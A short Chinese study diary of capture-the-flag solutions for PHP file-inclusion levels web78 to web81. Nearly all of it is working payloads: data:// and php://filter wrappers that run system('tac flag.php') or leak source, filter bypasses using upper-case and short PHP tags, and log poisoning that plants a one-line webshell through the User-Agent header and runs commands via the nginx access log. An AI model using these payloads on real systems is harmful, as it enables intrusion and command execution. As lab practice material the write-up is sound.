学习日记-3(文件包含篇)

web78

?file=data://text/plain,<?php system('tac flag.php');?>
或者
?file=php://filter/convert.base64-encode/resource=flag.php

web79

?file=data://text/plain,<?phP system('tac flag.php');?>
?file=data://text/plain,<?= system('tac flag.php');?>

php中代码开始标志类型(,,,<% %>,<%= %>)

web80+81

利用日志文件，先通过user-agent写入一句话木马

?file=/var/log/nginx/access.log 
POST:1=system("tac fl0g.php");